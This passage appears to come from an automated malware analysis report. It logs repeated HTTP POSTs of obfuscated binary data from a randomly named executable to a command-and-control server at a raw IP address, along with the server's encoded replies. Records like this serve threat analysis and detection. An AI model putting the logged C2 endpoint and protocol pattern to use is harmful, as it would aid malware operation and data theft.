Dec 10, 2024 07:34:20.995331049 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 25 57 3c 36 24 50 21 5a 2d 1c 3b 3e 30 53 30 22 38 40 2a 2d 3d 01 32 03 2b 00 3f 17 3f 10 36 3a 2e 15 3c 07 2b 11 2b 06 3d 52 28 39 2b 46 0c 1b 22 02 22 3b 36 1d 24 38 32 1d 2e 2d 2b 5a 2a 5b 29 04 22 3c 07 13 24 2f 23 58 37 2d 33 51 3c 17 01 00 26 03 2b 58 28 0d 2d 0d 23 11 23 56 03 1f 26 0c 29 3c 2a 1a 27 01 0f 0c 25 5e 3f 5c 24 2b 3b 13 29 29 0c 50 24 00 36 5f 24 3b 3b 0e 28 31 08 02 26 59 3b 03 3c 2d 2a 1a 24 33 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%W<6$P!Z-;>0S0"8@-=2+??6:.<++=R(9+F"";6$82.-+Z[)"<$/#X7-3Q<&+X(-##V&)<'%^?\$+;))P$6_$;;(1&Y;<-$3#S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49958	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:19.550616026 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:19.901294947 CET	2536	OUT	Data Raw: 55 5a 5a 52 50 40 56 52 5c 58 5b 56 51 52 56 55 59 51 5e 49 56 5f 54 5b 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UZZRP@VR\X[VQRVUYQ^IV_T[[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ^+U&_"-"U):Y&4/<+:_"549;D0%X;%'Z!.[)
Dec 10, 2024 07:34:20.877772093 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:21.111618042 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49963	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:21.346349001 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:21.698158026 CET	2536	OUT	Data Raw: 50 58 5f 5e 55 47 56 50 5c 58 5b 56 51 5d 56 56 59 55 5e 43 56 5f 54 5f 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: PX_^UGVP\X[VQ]VVYU^CV_T_[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU (="%>=1#79 ^?;5%71$-(<0>85'Z!.[)
Dec 10, 2024 07:34:22.675987959 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:22.911427975 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49968	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:23.165843010 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:23.524880886 CET	2536	OUT	Data Raw: 55 5f 5f 54 55 43 56 54 5c 58 5b 56 51 59 56 51 59 51 5e 47 56 5b 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U__TUCVT\X[VQYVQYQ^GV[T][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU + & >16_&Y4]!*((\!=4#X98<09,'Z!.[)$
Dec 10, 2024 07:34:24.521224976 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:24.755350113 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49974	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:25.002540112 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2528 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:25.354526043 CET	2528	OUT	Data Raw: 55 5f 5a 50 55 45 56 57 5c 58 5b 56 51 5a 56 56 59 50 5e 42 56 5b 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U_ZPUEVW\X[VQZVVYP^BV[T][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#)#".>6_1+#'+>6- ,.+%-*/%'Z!.[)<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49977	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:26.132821083 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2104 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:26.479432106 CET	2104	OUT	Data Raw: 55 59 5a 53 55 42 53 52 5c 58 5b 56 51 5a 56 55 59 53 5e 49 56 5b 54 5c 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UYZSUBSR\X[VQZVUYS^IV[T\[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU +3&Z5)5&&Y,_ *$\)+!.9#27[-+(0-)^/5'Z!.[)$
Dec 10, 2024 07:34:27.587737083 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:27.711390018 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 26 0c 2b 25 2f 0c 36 3f 21 1c 2d 3e 27 0a 27 0f 01 19 2a 3d 22 12 25 29 3b 06 2b 29 28 00 20 3a 29 02 3f 2a 3b 5f 2b 2c 3e 0a 3f 39 2b 46 0c 1b 22 00 23 2b 0c 1c 33 3b 3d 0d 2d 13 2f 10 28 3d 0b 04 21 3c 25 51 25 2c 23 5c 37 3d 2b 51 28 2a 2c 11 31 5b 2c 01 3c 33 29 0a 20 2b 23 56 03 1f 25 13 2b 2f 0b 08 30 3f 3d 0a 32 38 02 01 27 38 3c 02 2a 3a 26 54 30 10 31 06 24 06 24 56 2b 1f 3d 58 25 01 06 5a 3c 3e 3e 57 24 19 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&+%/6?!->''="%);+)( :)?;_+,>?9+F"#+3;=-/(=!<%Q%,#\7=+Q(,1[,<3) +#V%+/0?=28'8<:&T01$$V+=X%Z<>>W$#S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49978	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:26.330064058 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:26.702548981 CET	2536	OUT	Data Raw: 55 5e 5f 51 50 47 56 54 5c 58 5b 56 51 52 56 57 59 51 5e 42 56 5d 54 5c 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U^_QPGVT\X[VQRVWYQ^BV]T\[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#(#Z".V>S"\10[7$\)+"]": 2/Y.;D0*,'Z!.[)
Dec 10, 2024 07:34:27.587827921 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:27.811542988 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49983	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:28.050757885 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:28.401644945 CET	2536	OUT	Data Raw: 55 59 5a 50 55 4b 56 5c 5c 58 5b 56 51 5b 56 51 59 50 5e 47 56 53 54 59 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UYZPUKV\\X[VQ[VQYP^GVSTY[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU Y(*["X:U=S91?4:Z)+&!-:4W(-8#E%.:;%'Z!.[),
Dec 10, 2024 07:34:29.377228022 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:29.611670971 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49988	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:29.847342968 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:30.198214054 CET	2536	OUT	Data Raw: 55 51 5a 55 55 4b 56 54 5c 58 5b 56 51 59 56 57 59 55 5e 47 56 5f 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UQZUUKVT\X[VQYVWYU^GV_TX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#?6:W=*1(74^+6>6 2#_.E$>/5'Z!.[)$
Dec 10, 2024 07:34:31.174575090 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:31.407360077 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49994	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:31.643409967 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:32.002367020 CET	2536	OUT	Data Raw: 55 5a 5a 53 55 4a 56 56 5c 58 5b 56 51 5f 56 53 59 5d 5e 46 56 5c 54 5b 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UZZSUJVV\X[VQ_VSY]^FV\T[[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#<02\!=.V*:X&(^ \8)+!>:71[.<0>9Y;%'Z!.[)<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49998	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:32.837662935 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:33.183244944 CET	2116	OUT	Data Raw: 55 5a 5a 53 55 4b 53 51 5c 58 5b 56 51 59 56 5e 59 52 5e 44 56 5e 54 5a 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UZZSUKSQ\X[VQYV^YR^DV^TZ[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU )3)5*T)66^%<4 8+Y">>4W3[.+'A0",'Z!.[)$
Dec 10, 2024 07:34:34.178175926 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:34.445245028 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 25 11 2b 36 3f 08 36 02 21 55 38 2d 2b 0e 27 08 3c 41 3f 00 2e 5a 31 03 3c 15 3f 39 28 05 21 00 35 02 3f 2a 2b 13 28 3f 26 09 2a 29 2b 46 0c 1b 22 03 36 28 3d 0d 30 3b 36 57 2e 2d 05 5d 29 2d 36 5f 36 05 29 1e 27 3c 01 5a 34 5b 38 0e 3c 07 20 5d 26 2d 09 59 3f 33 08 1f 37 01 23 56 03 1f 25 55 29 3c 26 19 24 3f 25 0b 26 5e 37 5b 27 06 01 1e 29 07 22 19 26 3e 2d 00 26 38 2c 51 29 21 35 12 25 3f 06 19 2b 3d 32 1b 24 23 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%+6?6!U8-+'<A?.Z1<?9(!5?+(?&)+F"6(=0;6W.-])-6_6)'<Z4[8< ]&-Y?37#V%U)<&$?%&^7[')"&>-&8,Q)!5%?+=2$##S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49999	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:32.955797911 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:33.307564020 CET	2536	OUT	Data Raw: 50 58 5f 52 55 41 56 51 5c 58 5b 56 51 5d 56 52 59 57 5e 40 56 58 54 53 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: PX_RUAVQ\X[VQ]VRYW^@VXTS[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU Y(:^ >=?&6\&+#*;+="-_#!3X.;$-.5'Z!.[)
Dec 10, 2024 07:34:34.300720930 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:34.535445929 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	50005	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:34.961182117 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:35.307552099 CET	2536	OUT	Data Raw: 50 5d 5f 57 50 46 53 56 5c 58 5b 56 51 52 56 52 59 5c 5e 42 56 52 54 59 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P]_WPFSV\X[VQRVRY\^BVRTY[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU <0.^ =>?69&+#4(+&6>%Z#W4.+(%-6.%'Z!.[)
Dec 10, 2024 07:34:36.288640976 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:36.523363113 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	50009	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:36.767337084 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:37.120043039 CET	2536	OUT	Data Raw: 55 50 5f 57 55 41 56 51 5c 58 5b 56 51 5e 56 54 59 54 5e 47 56 5e 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UP_WUAVQ\X[VQ^VTYT^GV^T][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU Y+#=">.V)692?#8<;%#-5_43.('3X=\;'Z!.[)8
Dec 10, 2024 07:34:38.097491026 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:38.331756115 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	50014	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:38.582412958 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
